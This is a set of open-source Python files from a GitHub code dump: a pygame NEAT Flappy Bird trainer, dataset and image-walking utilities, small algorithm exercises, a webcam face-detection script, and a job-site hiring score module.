in Lemmatize_News_Words_List:\n            tmp_news = each_news\n            news_words = word_tokenize(each_news)\n            for each_word in news_words:\n                if each_word in all_stocks_possible_names:\n                    # strip the matched stock name (not the whole sentence) from the news line\n                    each_news = re.sub(r'\\b{}\\b'.format(re.escape(each_word)), '', each_news)\n            self.Log_It(tmp_news, each_news)\n            Cleaned_News.append(each_news)\n        return Cleaned_News\n\n\n    def __del__(self):\n        self.News_File_Opened.close()\n\n# Clean_News_Data(Date='20181023')\n\n","repo_name":"NandaCj/Machine_Learning1","sub_path":"Stock_News_Analysis/Clean_Data/Clean_Filtered_News.py","file_name":"Clean_Filtered_News.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23446903930","text":"'''\nGuide for config file -\nYou can refer to: https://neat-python.readthedocs.io/en/latest/config_file.html\n\nBut you can use this project's config file as a template if you want to start as soon as possible\n1. Copy and paste this project's config file to your config file\n2. And change the details according to your project's requirements in ONLY THE FIRST 3 BLOCKS\n\nThe first 3 blocks are marked in the config file in case you fail to find them.\nAnd fitness_threshold is the maximum/optimum fitness that you want\n'''\n\n# importing all modules\nimport pygame as pg # simulation module\nimport neat # main NEAT module (pip install neat-python)\nfrom collections import deque # deque is just a list with maximum size and removes old items automatically\nfrom random import randint # just to set the pipe's y position\n\n# starting pygame and font to display score, generation etc.\npg.init()\npg.font.init()\n\n# mainly as a treat to the eyes (draws a line from the bird to the pipe)\ndraw_lines = True\n\n# defining the screen and its height and width\nscreen_width, screen_height = 400, 600\nscreen = pg.display.set_mode((screen_width, screen_height))\n\n# the background image (found no other place to initialise it!)\nbg_image = pg.transform.scale(pg.image.load(\"Images/background.gif\"), (screen_width, screen_height - 100))\n\n# defining the font and some colors\nfont = pg.font.Font('freesansbold.ttf', 32)\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREEN = 0, 255, 0\n\n# defining the fps or the speed of the game (can be increased or decreased using up and down arrow keys)\nfps = 20\nfps_clock = pg.time.Clock()\n\n# the bird class\nclass Bird:\n    def __init__(self):\n        # starting x and y position of the bird\n        self.x = screen_width // 4\n        self.y = screen_height // 2\n\n        # loading the image of the bird and defining a rect for collision detection\n        self.image = pg.transform.scale(pg.image.load(\"Images/bird.gif\"), (screen_height // 12, screen_height // 12))\n        self.rect = None\n\n        # how much to change y position of the bird when jumping and falling\n        self.jump_power = 50\n        self.fall_power = 15\n\n    def 
display(self):\n # displaying the bird and making it fall\n self.fall()\n self.rect = screen.blit(self.image, (self.x, self.y))\n\n def jump(self):\n # making the bird jump if it doesn't go out of the screen (upwards)\n if self.y > 0:\n self.y -= self.jump_power\n\n def fall(self):\n # making the bird fall\n self.y += self.fall_power\n\n# class for the pipe(s)\nclass Pipe:\n def __init__(self):\n # loading the top and bottom pipes' images\n self.image_top = pg.transform.scale(pg.image.load(\"Images/pipet.gif\"), (screen_width // 4, screen_height))\n self.image_bottom = pg.transform.scale(pg.image.load(\"Images/pipeb.gif\"), (screen_width // 4, screen_height))\n\n # the rect of both (for collision detection)\n self.top_rect = None\n self.bottom_rect = None\n\n # defining the gap between the top and bottom pipes, the x position and the random y position\n self.gap = 150\n self.x = screen_width\n self.y = randint(0, screen_height - 100 - self.gap)\n\n def display(self):\n # displaying the pipes\n self.top_rect = screen.blit(self.image_top, (self.x, self.y - self.image_top.get_height()))\n self.bottom_rect = screen.blit(self.image_bottom, (self.x, self.y + self.gap))\n\n def move(self):\n # moving the pipes to the left\n self.x -= 10\n\n def check_collision(self, bird_rect):\n # collision detection with the bird (notice the rect of the bird)\n return self.top_rect.colliderect(bird_rect) or self.bottom_rect.colliderect(bird_rect)\n\n def reached_bird(self):\n # just getting info if the pipe has reached the bird\n return self.x + self.image_top.get_width() == screen_width // 4\n\n# class for the ground (I did not intend to make a new whole new class for the ground but added it anyway)\nclass Ground:\n def __init__(self):\n # as usual the loading the images but not the rect (reason given later)\n self.image = pg.transform.scale(pg.image.load(\"Images/ground.gif\"), (screen_width, screen_height // 6))\n\n # the x and y position of the ground and it is just static\n self.x = 0\n self.y = screen_height - self.image.get_height()\n\n def display(self):\n # displaying the ground\n self.rect = screen.blit(self.image, (self.x, self.y))\n\n def collide_with_ground(self, bird_obj):\n # not using rect as it is an extensive process and collision can simply be checked by using y position\n # if bird's y is greater than ground's y then it has collided\n return bird_obj.y > self.y\n\n# the main controller or the environment\nclass GameEnv:\n def __init__(self):\n # the list for the birds\n self.birds = []\n\n # list for pipes and DEQUE ALERT!!!\n self.pipes = deque(maxlen=2) # notice the maxlen\n self.pipes.append(Pipe()) # adding the first pipe\n\n # initialising some extra details\n self.score = 0\n self.generation = 0 # seems akward but okay?!\n self.alive_birds = len(self.birds)\n\n # and finally the ground\n self.ground = Ground()\n\n def add_bird(self, genome, config):\n # adding bird based on the genome and config\n\n # genome is like the store of information (not sure, just intuition)\n genome.fitness = 0\n # net is the bird's brain\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n # The main body or the Bird object\n bird_body = Bird()\n\n # adding the full bird to the birds list\n self.birds.append(\n {\n \"bird_obj\": bird_body,\n \"net\": net,\n \"genome\": genome,\n }\n )\n\n def display_all(self):\n # nothing fancy just displaying everything-\n\n # 1. all birds\n for bird in self.birds:\n bird[\"bird_obj\"].display()\n\n # 2. all pipes\n for pipe in self.pipes:\n pipe.display()\n\n # 3. 
the ground\n self.ground.display()\n\n def check_removal_birds(self):\n # main site of checking collisions\n\n # define a list, add all collided birds to the list and remove them from the birds list at the end\n # because removing it on the go gives an error\n birds_to_remove = []\n\n # check for all birds\n for bird in self.birds:\n # finally, THE BIRD RECT\n bird_rect = bird[\"bird_obj\"].rect\n\n # and with pipes\n for pipe in self.pipes:\n\n # check collision with the ground\n if self.ground.collide_with_ground(bird[\"bird_obj\"]):\n birds_to_remove.append(bird)\n break\n\n if pipe.check_collision(bird_rect):\n birds_to_remove.append(bird)\n break\n\n # now just remove the collided birds from the main birds list\n for rem in birds_to_remove:\n rem[\"genome\"].fitness -= 1\n self.birds.remove(rem)\n\n # updating the number of the birds alive\n self.alive_birds = len(self.birds)\n\n def move_pipes(self):\n # just like the previous problem - gives an error if pipes are added on the go\n pipes_to_append = []\n\n # iterating over all pipes\n for pipe in self.pipes:\n # move the pipe\n pipe.move()\n\n # if the pipe reaches the birds then just update the score\n if pipe.reached_bird():\n self.score += 1\n pipes_to_append.append(Pipe()) # and add a new pipe, the old pipe that is beyond the screen is automatically deleted (because of deque)\n\n # Tip: to add list to another list use extend instead append\n self.pipes.extend(pipes_to_append) # just add the new pipes\n\n def get_info(self, bird):\n # this is just the pipe ahead of the bird\n pipe = self.pipes[-1]\n\n # if draw_lines is True then just show \"what the bird sees\"\n width = pipe.image_top.get_width()\n if draw_lines:\n pg.draw.line(screen, RED, (bird.x, bird.y), (pipe.x + width, pipe.y), 3)\n pg.draw.line(screen, GREEN, (bird.x, bird.y), (pipe.x + width, pipe.y + pipe.gap), 3)\n\n # and finally return the information\n return (\n bird.y, # bird's y position\n pipe.y, # top pipe's y position\n pipe.y + pipe.gap, # bottom pipe's y position\n pipe.x # and pipe's x position\n )\n\n def move_birds(self):\n # moving the birds according to their brains or the NEAT net\n for bird in self.birds:\n # For more distance keep adding the fitness (i.e. 
more distance -> more fitness)\n bird[\"genome\"].fitness += 1\n\n # just think according to the information given by the above method\n output = bird[\"net\"].activate(self.get_info(bird[\"bird_obj\"]))\n\n # if output is greater than 0.5 then jump\n # we are using sigmoid activation with val ranging from 0 to 1 so if probability is greater than 50% then jump\n if output[0] > 0.5:\n bird[\"bird_obj\"].jump()\n\n def all_dead(self):\n # just a helper method to know if all birds are dead\n return not len(self.birds) > 0\n\n def reset(self):\n # just the initial setting is called when reset is called\n self.birds = []\n self.score = 0\n\n self.pipes = deque(maxlen=2)\n self.pipes.append(Pipe())\n\n self.ground = Ground()\n\n # as this will only be called when one generation finishes, so increase the generation number\n self.generation += 1\n\n# defining the main game env\n##################\nenv = GameEnv() ##\n##################\n\n# THIS IS THE MAIN FUNCTION THAT WILL CALLED AFTER EACH GENERATION AND IS DIRECTLY USED BY THE neat-python MODULE\ndef eval_genomes(genomes, config):\n # just get the global fps to change it later\n global fps\n\n # Just to start the program when user hits enter (or anything)\n if env.generation == 0:\n input(\"Press enter to start: \")\n\n # this is something special to just add the members in the population\n # and this tends to give the population size given in the config file\n for genome_id, genome in genomes:\n env.add_bird(genome, config)\n\n # the main loop\n while True:\n # draw the background\n screen.blit(bg_image, (0, 0))\n\n # the environment functions\n env.move_pipes()\n env.move_birds()\n env.display_all()\n env.check_removal_birds()\n\n # if all birds are dead just reset the environment and break the loop, the neat-python module will handle it automatically\n if env.all_dead():\n env.reset()\n break\n\n # just displaying the extra information\n screen.blit(font.render(f\"Generation: {env.generation}\", True, WHITE), (10, screen_height - 100))\n screen.blit(font.render(f\"Score: {env.score}\", True, WHITE), (10, screen_height - 70))\n screen.blit(font.render(f\"Birds Alive: {env.alive_birds}\", True, WHITE), (10, screen_height - 40))\n\n # the event loop\n for event in pg.event.get():\n # if you click the close button, then close the window and stop the program\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n\n # this just to control the fps\n if event.type == pg.KEYDOWN:\n # up key to increase the fps\n if event.key == pg.K_UP:\n fps += 5\n # down key to decrease the fps\n elif event.key == pg.K_DOWN:\n fps -= 5\n\n # update the screen and respect the fps (just do everything according to the fps)\n pg.display.update()\n fps_clock.tick(fps)\n\ndef main():\n config_file = \"config.txt\" # just the main config file\n\n # this line seems to be omnipresent in almost all neat-python examples by Code-Reclaimers\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # initialise the main population\n p = neat.Population(config)\n\n # just adding some reporters to give the report and statistics of the generation\n # perfectly safe to comment out\n p.add_reporter(neat.StdOutReporter(True))\n p.add_reporter(neat.StatisticsReporter())\n\n # this just says -\n # hey population, here is the main eval_genomes functions and here is the number of generations I want you to run this for\n # But if any bird's fitness exceeds the fitness_threshold (in config file) then it will 
automatically stop the program (when the bird collides without running it for all generations)\n winner = p.run(eval_genomes, 5000)\n print(f\"Best genome:\\n {winner}\")\n\n# and this is just calling the main function\nif __name__ == '__main__':\n main()\n\n# stopping pygame\npg.quit()\n\n'''\nTHE END\nThank You\n'''\n","repo_name":"reddragonnm/FlappyBird-AI","sub_path":"v1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13189,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"37751718679","text":"import os\nimport re\nimport shutil\nfrom rich.progress import track\n\nclass DatasetManager:\n \"\"\"\n Utility class for managing datasets by organizing and moving files into train, test, and validation folders.\n\n Args:\n dataset_path (str): The path to the dataset directory.\n\n Attributes:\n dataset_path (str): The path to the dataset directory.\n train_path (str): The path to the train folder within the dataset.\n test_path (str): The path to the test folder within the dataset.\n val_path (str): The path to the validation folder within the dataset.\n class_labels (list): A list of class labels.\n\n Methods:\n create_folders():\n Creates the train, test, and validation folders if they don't exist.\n load_class_labels(classes_file: str):\n Loads the class labels from a file.\n create_class_subfolders():\n Creates subfolders within the train, test, and validation folders for each class label.\n move_files(filename: str):\n Moves the files from the source directory to their respective class subfolders.\n\n \"\"\"\n \n def __init__(self, dataset_path):\n self.dataset_path = dataset_path\n self.train_path = os.path.join(f'{dataset_path}/images', 'train')\n self.test_path = os.path.join(f'{dataset_path}/images', 'test')\n self.val_path = os.path.join(f'{dataset_path}/images', 'val')\n self.class_labels = []\n\n def create_folders(self):\n os.makedirs(self.train_path, exist_ok=True)\n os.makedirs(self.test_path, exist_ok=True)\n os.makedirs(self.val_path, exist_ok=True)\n\n def load_class_labels(self, classes_file):\n with open(classes_file, \"r\") as file:\n for line in file:\n label = line.strip().replace(\"\\t\", \"\").title()\n self.class_labels.append(label)\n\n def create_class_subfolders(self):\n for label in self.class_labels:\n train_class_folder = os.path.join(self.train_path, label)\n test_class_folder = os.path.join(self.test_path, label)\n val_class_folder = os.path.join(self.val_path, label)\n os.makedirs(train_class_folder, exist_ok=True)\n os.makedirs(test_class_folder, exist_ok=True)\n os.makedirs(val_class_folder, exist_ok=True)\n\n def move_files(self, filename):\n if filename == \"val.txt\":\n file_path = os.path.join(self.dataset_path, \"val.txt\")\n destination_path = self.val_path\n elif filename == \"train.txt\":\n file_path = os.path.join(self.dataset_path, \"train.txt\")\n destination_path = self.train_path\n elif filename == \"test.txt\":\n file_path = os.path.join(self.dataset_path, \"test.txt\")\n destination_path = self.test_path\n \n with open(file_path, \"r\") as file:\n for line in track(file, description=\"Extracting dataset ...\"):\n data = line.strip().split(\" \")\n if len(data) == 2:\n image_name, class_label = data\n class_folder = self.class_labels[int(class_label)]\n source_file = os.path.join(self.dataset_path, \"images\", image_name)\n destination_folder = os.path.join(destination_path, class_folder)\n shutil.move(source_file, 
destination_folder)\n\n","repo_name":"adhiiisetiawan/large-scale-pest-recognition","sub_path":"pest_rec/data/components/dataset_manager.py","file_name":"dataset_manager.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"21682454923","text":"from django.contrib import admin\nfrom .models import *\n\nclass BuildingDataAdmin(admin.ModelAdmin):\n model = BuildingData\n list_display = ('id', 'name')\n list_filter = ('name', )\n\n\nclass MeterDataAdmin(admin.ModelAdmin):\n model = MeterData\n\n\nclass HalfHourlyDataAdmin(admin.ModelAdmin):\n model = HalfHourlyData\n\nadmin.site.register(BuildingData, BuildingDataAdmin)\nadmin.site.register(MeterData, MeterDataAdmin)\nadmin.site.register(HalfHourlyData, HalfHourlyDataAdmin)\n# admin.site.register(BuildingDataAdmin, MeterDataAdmin, HalfHourlyDataAdmin)","repo_name":"fistadev/django_sql","sub_path":"data/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22164056211","text":"def Pisano_period(num):\n answer = 2\n mod1, mod2 = 2, 3\n while True:\n if mod1 % num == 1 and mod2 % num == 1:\n break\n answer += 1\n mod1, mod2 = mod2, (mod1 + mod2) % num\n return answer\n\n#(f(n-2) % m + f(n-1) % m) % m = f(n) % m\n\nn=int(input())\nfor _ in range(n):\n a, b = map(int,input().split())\n print(a,Pisano_period(b))","repo_name":"Green-Record/algorithm-study","sub_path":"HomeWork/jin/4/9471.py","file_name":"9471.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12226402741","text":"def sortAbs(array):\n \n if len(array)<= 1:\n return array\n \n pivot = array[0]\n left = getSmall(array[1:],pivot)\n right= getLarge(array[1:],pivot)\n\n return sortAbs(left)+[pivot]+sortAbs(right)\n \ndef getSmall(array,pivot):\n data = []\n for a in array:\n if abs(a)<= abs(pivot):\n if abs(a)==abs(pivot):\n if a <= pivot:\n data.append(a)\n else:\n data.append(a) \n return data\n \ndef getLarge(array,pivot):\n data = []\n for a in array:\n if abs(a)>= abs(pivot):\n if abs(a)==abs(pivot):\n if a > pivot:\n data.append(a)\n else:\n data.append(a)\n return data\n\ndef main():\n line = [int(x) for x in input().split()]\n\n print(*sortAbs(line))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zinseo964/Algorithm","sub_path":"0428/sortAbs_quick.py","file_name":"sortAbs_quick.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18511399532","text":"import os\n\n# all extensions should be in lower case\nEXTENSIONS = [\"jpg\", \"png\", \"bmp\"]\n\nclass ResourceInfo(object):\n\n def __init__(self, **kwargs):\n self.url = kwargs.get(\"url\", None)\n if not self.url:\n raise TypeError(\"ResourceInfo() missing required kwarg 'url'\")\n self.name = kwargs.get(\"name\", os.path.basename(self.url))\n\n def getName(self):\n return self.name\n\n def getUrl(self):\n return self.url\n\nclass BaseResourceWalker(object):\n\n def next(self):\n return False\n\n def prev(self):\n return False\n\n def currentResource(self):\n \"\"\" returns the ResourceInfo of the current resource \"\"\"\n return None\n\nclass DirectoryWalker(BaseResourceWalker):\n\n def __init__(self, path):\n path = os.path.abspath(path)\n # decide the directory to walk and the starting 
file\n        if os.path.isfile(path):\n            # if `path` is a file, then walk its parent directory\n            self.directory = os.path.dirname(path)\n            filename = os.path.basename(path)\n        elif os.path.isdir(path):\n            # `path` is a directory\n            self.directory = path\n            filename = None\n        else:\n            raise IOError()\n        self.index = 0\n        self.extensions = EXTENSIONS\n        self.__refresh(origFile=filename)\n\n    def __refresh(self, origFile=None):\n        files = []\n        for f in sorted(os.listdir(self.directory)):\n            filename = os.path.join(self.directory, f)\n            base, ext = os.path.splitext(filename)\n            ext = ext[1:].lower() # remove the dot, e.g. \".jpg\" => \"jpg\"\n            if os.path.isfile(filename) and ext in self.extensions:\n                files.append(f)\n        self.index = files.index(origFile) if origFile in files else 0\n        self.files = files\n\n    def next(self):\n        if self.index < len(self.files) - 1:\n            self.index += 1\n            return True\n        else:\n            return False\n\n    def prev(self):\n        if self.index > 0:\n            self.index -= 1\n            return True\n        else:\n            return False\n\n    def currentResource(self):\n        if self.index >= 0 and self.index < len(self.files):\n            url = os.path.join(self.directory, self.files[self.index])\n            res = ResourceInfo(url=url)\n            return res\n","repo_name":"lzh9102/jkbiv-gtk","sub_path":"jkbiv/res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"41642725675","text":"from typing import Dict, List\n\nimport pandas as pd\n\nfrom labs.lab_1.util.constants import DATE_DAY_PRECISION, DATE_WEEK_PRECISION, DAY_OF_WEEK, HOUR_OF_DAY, USER, ENDPOINT\nfrom labs.lab_1.util.extensions import is_add_request, is_order_request, get_id_from_add_request\nfrom labs.lab_1.util.splitter import split_by_keys\nfrom labs.util.benchmarking.measuring import measure_execution_time\nfrom labs.util.plot.graphics import single_plot, multi_plot\n\n\n# No. 14\n# Question: How effective is the goods shipping service?\n# Hypothesis: The goods turnover over the whole period equals: ...\n\n@measure_execution_time\ndef main_14(dataframe: pd.DataFrame) -> float:\n    keys: List[str] = [DATE_DAY_PRECISION, DATE_WEEK_PRECISION, DAY_OF_WEEK, HOUR_OF_DAY]\n    data: Dict[str, Dict[str, float]] = dict()\n    for key in keys:\n        values: Dict[str, float] = split_by_keys(key, dataframe, lambda frame: _compute_14(frame))\n        data.update({key: values})\n        single_plot(values, 14, key.lower())\n\n    multi_plot(list(data[DATE_DAY_PRECISION].values()), 14, \"all\")\n    return _compute_14(dataframe)\n\n\ndef _compute_14(dataframe: pd.DataFrame) -> float:\n    users_items: Dict[str, List[str]] = dict()\n    ordered_count: Dict[str, int] = {\"ordered_count\": 0}\n\n    def update_data(_user: str, request: str) -> None:\n        if is_add_request(request):\n            if _user in users_items:\n                users_items[_user].append(get_id_from_add_request(request))\n            else:\n                users_items.update({_user: [get_id_from_add_request(request)]})\n        elif is_order_request(request):\n            items: List[str] = users_items.get(_user, [])\n            ordered_count.update({\"ordered_count\": ordered_count[\"ordered_count\"] + len(items)})\n            items.clear()\n\n    for index in dataframe.index:\n        row: pd.Series = dataframe.loc[index]\n        user_id: str = str(row[USER])\n        url: str = str(row[ENDPOINT])\n        update_data(user_id, url)\n\n    return 
ordered_count[\"ordered_count\"]\n","repo_name":"AlexCawl/DataAnalysisLabs","sub_path":"labs/lab_1/hypotheses/cargo_service/hypothesis_14.py","file_name":"hypothesis_14.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34650896498","text":"import cv2\nfrom random import randrange\n\ntrained_face_data = cv2.CascadeClassifier(\n    'haarcascade_frontalface_default.xml')\n\nwebcam = cv2.VideoCapture(0)\n\n\nwhile True:\n    successful_frame_read, frame = webcam.read()\n\n    # convert to grey scale\n    greyScaleImage = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n    # each detection from detectMultiScale is an (x, y, w, h) rectangle\n    for (x, y, w, h) in faceCoordinates:\n        cv2.rectangle(frame, (x, y), (x+w, y+h),\n                      (randrange(256), randrange(256), randrange(256)), 6)\n\n    # show image\n    cv2.imshow(\"Face Detection\", frame)\n\n    # prevents window from closing instantly\n    key = cv2.waitKey(1)\n\n    if key == 81 or key == 113:\n        break\n\nwebcam.release()\n","repo_name":"bradshaw10/FacialRecognition","sub_path":"Face_Detector.py","file_name":"Face_Detector.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17071784072","text":"import math\nfrom functools import lru_cache\nfrom typing import Optional, Union\nfrom decimal import Decimal\n\nfrom labonneboite.common import mapping as mapping_util\nfrom labonneboite.common.conf import settings\nfrom labonneboite.common.load_data import load_metiers_tension\nfrom labonneboite.common.mapping import Rome, Naf\n\nScore = int\nHiring = int\nStars = float\n\n# scores between 0 and 100\nSCORE_FOR_ROME_MINIMUM = 20\nSCORE_ALTERNANCE_FOR_ROME_MINIMUM = 20\n\n# stars between 0.0 and 5.0\nSTARS_MINIMUM = 2.5\nSTARS_MAXIMUM = 5.0\n\n# The threshold for the score, that defines if a company is \"Bonne boîte\"\n# can't be below this value.\nMINIMUM_POSSIBLE_SCORE = 5\n\n\n# ############### WARNING about matching scores vs hirings ################\n# Methods scoring_util.get_hirings_from_score\n# and scoring_util.get_score_from_hirings\n# rely on special coefficients SCORE_50_HIRINGS, SCORE_60_HIRINGS etc.\n# whose values in the github repository are *fake* and used for dev and test only.\n#\n# The real values are confidential, stored outside of github repo,\n# and only used in staging and production.\n#\n# This is designed so that you *CANNOT* guess the hirings based\n# on the score you see in production.\n# #########################################################################\n\n\ndef round_half_up(x: float) -> int:\n    \"\"\"\n    The 'round' function from Python 3 is different from Python 2.7's:\n    https://docs.python.org/2.7/library/functions.html#round\n    https://docs.python.org/3/library/functions.html#round\n\n    This function emulates the behaviour from Python 2.7, where:\n\n    round(integer + 0.5) == integer + 1 if integer >= 0 else integer\n    \"\"\"\n    diff = x - math.floor(x)\n    if diff < 0.5:\n        return int(math.floor(x))\n    elif diff > 0.5:\n        return int(math.ceil(x))\n\n    return int(math.ceil(x) if x > 0 else math.floor(x))\n\n\n# very good hit/miss ratio observed while running create_index.py\n# thanks to bucketing float values of hirings, see get_score_from_hirings\n@lru_cache(maxsize=512 * 1024)\ndef _get_score_from_hirings(hirings: Hiring) -> Score:\n    \"\"\"\n    Note: leading underscore in method name means \"private 
method\" (python naming convention).\n\n Transform a number of hirings (typically, the predicted hirings in the next 6 months)\n which is a float between 0 and 1000 or even more (it is the output of the regression model)\n into a score (int between 50 and 100) just like in the previous binary classification model.\n\n The underlying formula has been designed when switching from a binary classification model\n to a regression model, in order to roughly keep the same volumes of 1-stars, 2-stars,\n 3-stars and 4-stars offices.\n\n 0.0 stars ~ 0 hirings\n 2.5 stars ~ SCORE_50_HIRINGS hirings\n 3.0 stars ~ SCORE_60_HIRINGS hirings\n 4.0 stars ~ SCORE_80_HIRINGS hirings\n 5.0 stars ~ SCORE_100_HIRINGS+ hirings\n\n For confidentiality reasons, we cannot disclose the SCORE_*_HIRINGS values.\n \"\"\"\n if hirings <= settings.SCORE_50_HIRINGS:\n # this way about 500K offices will be selected to be deployed in production\n # and all others (score below 50) will be automatically filtered out\n score = 0.0 + 50 * (hirings - 0.0) / (settings.SCORE_50_HIRINGS - 0.0)\n elif hirings >= settings.SCORE_100_HIRINGS:\n score = 100.0\n elif hirings <= settings.SCORE_60_HIRINGS:\n score = 50.0\n score += 10 * (hirings - settings.SCORE_50_HIRINGS) / (settings.SCORE_60_HIRINGS - settings.SCORE_50_HIRINGS)\n elif hirings <= settings.SCORE_80_HIRINGS:\n score = 60.0\n score += 20 * (hirings - settings.SCORE_60_HIRINGS) / (settings.SCORE_80_HIRINGS - settings.SCORE_60_HIRINGS)\n elif hirings <= settings.SCORE_100_HIRINGS:\n score = 80.0\n score += 20.0 / math.log10(settings.SCORE_100_HIRINGS) * math.log10(1 + hirings - settings.SCORE_80_HIRINGS)\n else:\n raise Exception(\"unexpected value of hirings : %s\" % hirings)\n\n # score should always be positive\n score = max(0.0, score)\n\n return round_half_up(score)\n\n\ndef get_score_from_hirings(hirings: Union[float, Hiring], skip_bucketing: bool = False) -> Score:\n \"\"\"\n Bucket values of float hirings in order to improve hit/miss ratio of underlying\n private method _get_score_from_hirings.\n \"\"\"\n if skip_bucketing:\n pass\n elif hirings <= 3:\n hirings = round(hirings, 1)\n else:\n hirings = round_half_up(hirings)\n return _get_score_from_hirings(hirings)\n\n\n# very good hit/miss ratio observed while running create_index.py\n@lru_cache(maxsize=1024)\ndef get_hirings_from_score(score: Score) -> Hiring:\n \"\"\"\n does exactly the reverse operation of get_score_from_hirings\n \"\"\"\n\n if (isinstance(score, Decimal)):\n score = int(score)\n\n if score <= 50:\n hirings = settings.SCORE_50_HIRINGS * score / 50.0\n elif score <= 60:\n hirings = settings.SCORE_50_HIRINGS\n hirings += (score - 50) / 10.0 * (settings.SCORE_60_HIRINGS - settings.SCORE_50_HIRINGS)\n elif score <= 80:\n hirings = settings.SCORE_60_HIRINGS\n hirings += (score - 60) / 20.0 * (settings.SCORE_80_HIRINGS - settings.SCORE_60_HIRINGS)\n elif score <= 100:\n hirings = -1 + settings.SCORE_80_HIRINGS\n hirings += 10.0 ** ((score - 80) / 20.0 * math.log10(settings.SCORE_100_HIRINGS))\n else:\n raise Exception(\"unexpected value of score : %s\" % score)\n return Hiring(round(hirings))\n\n\n# very good hit/miss ratio observed while running create_index.py\n@lru_cache(maxsize=256 * 1024)\ndef get_score_adjusted_to_rome_code_and_naf_code(*, rome_code: Rome, naf_code: Naf, score: Optional[Score] = None,\n hiring: Optional[Hiring] = None) -> Score:\n \"\"\"\n Adjust the score to a rome_code (e.g. the ROME code of the current search)\n and a naf_code (e.g. 
NAF code of an office)\n The resulting score is an integer and might be below 50 (from 0 to 100)\n \"\"\"\n\n # fallback to main score in some cases\n # - no rome_code in context (favorites page, office page...)\n # - orphaned naf_code (no related rome_code)\n # - rome_code is not related to the naf_code (custom ROME via SAVE)\n if (not rome_code or naf_code not in mapping_util.MANUAL_NAF_ROME_MAPPING\n or rome_code not in mapping_util.MANUAL_NAF_ROME_MAPPING[naf_code]):\n return get_score_from_hirings(hiring) if hiring is not None else score\n\n total_office_hirings = hiring if hiring is not None else get_hirings_from_score(score)\n affinity = mapping_util.get_affinity_between_rome_and_naf(rome_code, naf_code)\n office_hirings_for_current_rome = total_office_hirings * affinity\n\n # result should be integer\n return get_score_from_hirings(office_hirings_for_current_rome)\n\n\ndef get_stars_from_score(score: float) -> float:\n \"\"\"\n Convert the score (integer theoretically between 0 and 100)\n to a number of stars (float theoretically between 0.0 and 5.0).\n\n All documentation below is based on the assumption that SCORE_FOR_ROME_MINIMUM is 20,\n STARS_MINIMUM is 2.5 and STARS_MAXIMUM is 5.0. This makes things\n more readable hopefully.\n\n The score is actually between 20 and 100, as lower scores were filtered out by the create_index process.\n Exception: this stays true for all scores per rome_code, but not for\n the general all-jobs-included score which might still sometimes be below 20.\n\n Stars were initially between 1.0 and 5.0, matching scores between 20 and 100,\n however as lower stars may give a bad unjustified feeling about the company, we artificially raise the\n stars to be guaranteed to be between 2.5 and 5.0.\n\n Returned stars number always has 1 digit exactly. (i.e. 
4.3 or 3.0 but not 4.35)\n \"\"\"\n score_min = SCORE_FOR_ROME_MINIMUM\n score_max = 100.0\n\n # adjust for rare case of all-jobs-included score below 20\n # happens for example on the office details page without rome_code context\n score = max(score, score_min)\n\n # normalize score between 0 and 1\n normalized_score = (score - score_min) / (score_max - score_min)\n\n stars = STARS_MINIMUM + normalized_score * (STARS_MAXIMUM - STARS_MINIMUM)\n\n # round to 1 digit\n stars = round(stars, 1)\n\n return stars\n\n\ndef get_score_from_stars(stars: float) -> float:\n \"\"\"\n Reverse of get_stars_from_score(score).\n \"\"\"\n score_min = SCORE_FOR_ROME_MINIMUM\n score_max = 100.0\n\n # Ensure stars is inside its allowed range.\n stars = max(stars, STARS_MINIMUM)\n stars = min(stars, STARS_MAXIMUM)\n\n normalized_score = (stars - STARS_MINIMUM) / (STARS_MAXIMUM - STARS_MINIMUM)\n score = score_min + normalized_score * (score_max - score_min)\n return score\n\n\ndef get_score_minimum_for_rome(rome_code: str) -> int:\n \"\"\"\n rome_code : the rome code for which we want to have the minimum threshold\n\n return score between `MINIMUM_POSSIBLE_SCORE` and the parameter `scoring_util.SCORE_FOR_ROME_MINIMUM`\n\n if the companies have 0% tension, the returned score will be :\n `scoring_util.SCORE_FOR_ROME_MINIMUM`\n\n if the companies have 100% tension, the returned score will be :\n `MINIMUM_POSSIBLE_SCORE`\n \"\"\"\n # https://trello.com/c/QvfphuOY/1468-m%C3%A9tiers-en-tension\n #\n # We want to increase the number of company, for code rome matching to\n # \"métiers en tension\" : jobs which has more offers, than appliers\n # To increase the number of these companies, we have to lower\n # the threshold : score for rome minimum\n\n score_for_rome_minimum = SCORE_FOR_ROME_MINIMUM\n\n rome_to_tension = load_metiers_tension()\n score_minimum_for_rome = score_for_rome_minimum\n\n interval = score_for_rome_minimum - MINIMUM_POSSIBLE_SCORE\n\n if rome_code in rome_to_tension:\n tension = rome_to_tension[rome_code]\n score_minimum_for_rome = (interval * ((100 - tension) / 100)) + MINIMUM_POSSIBLE_SCORE\n\n return 